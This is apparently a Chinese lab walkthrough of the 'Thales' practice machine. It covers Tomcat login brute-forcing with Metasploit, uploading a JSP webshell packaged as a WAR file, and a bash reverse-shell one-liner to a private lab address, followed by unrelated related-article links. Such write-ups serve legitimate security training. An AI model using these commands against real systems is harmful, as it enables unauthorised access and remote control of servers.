当前位置: 首页 > news >正文

Thales靶场

信息收集

将靶机改为net模式,开启kali进行扫描,得到靶机ip

对靶机的端口,目录进行扫描,8080端口是 apache tomcat代理

进入8080端口,点击app出现登录窗口,弱口令没试出来,可以爆破登录窗口

查了一下,都是msf爆破【Web安全】kali渗透工具MSF以及msfconsole命令详解_kali msfconsole-CSDN博客

msfconsole
search tomcat login
use 0
show options
set STOP_ON_SUCCESS true
set RHOSTS (靶场ip)
run

登录上去后,可以找到部署war文件的位置,可以发现可以上传文件

我们将自己的jsp木马文件压缩成zip文件,然后把后缀改成war

访问木马文件,用哥斯拉连接

那么我们进行反弹shell,在kali开启监听,在虚拟终端输入命令进行反弹shell到kali上

bash -c 'bash -i>& /dev/tcp/192.168.247.131/8888 0>&1'

监听成功

相关文章:

  • Netty源码—6.ByteBuf原理二
  • AI Agent开发大全第十一课-超维空间里的语义翻译官:Embedding技术
  • 个人学习编程(3-25) leetcode刷题
  • Linux 练习二 LVS的NAT模式
  • 从C语言开始的C++编程生活(2)
  • Java基础关键_028_线程(一)
  • 3.24前端模拟面试
  • C语言基础系列【28】指针进阶1:深入理解指针
  • go test相关命令
  • 医院挂号预约小程序|基于微信小程序的医院挂号预约系统设计与实现(源码+数据库+文档)
  • Tomcat相关的面试题
  • T113-S3-启动报错tee_readfdt:433finenode/firmware/opteefailedwith FDT_ERR_NOTFOUND
  • SpringBoot分布式项目中MyBatis实战技巧:从配置到性能优化
  • 3、孪生网络/连体网络(Siamese Network)
  • 将 PDF 转换为 Word — 固定布局 vs 重排布局?
  • 团体协作项目总结Git
  • 23种设计模式-备忘录(Memento)设计模式
  • ubuntu解决蓝牙耳机已连接,但没有声音
  • docker安装flink
  • OpenCV 基础全方位剖析:夯实计算机视觉开发根基
  • 做网站建设费用/市场营销策划ppt
  • 电商类网站怎么做推广/搜索引擎调词软件
  • 新手 网站建设 书籍/最新提升关键词排名软件
  • 怎样快速建设网站模板/查询网站相关网址
  • 唐山公司网站制作/百度网站如何优化排名
  • 企业网站制作是什么/关键词排名监控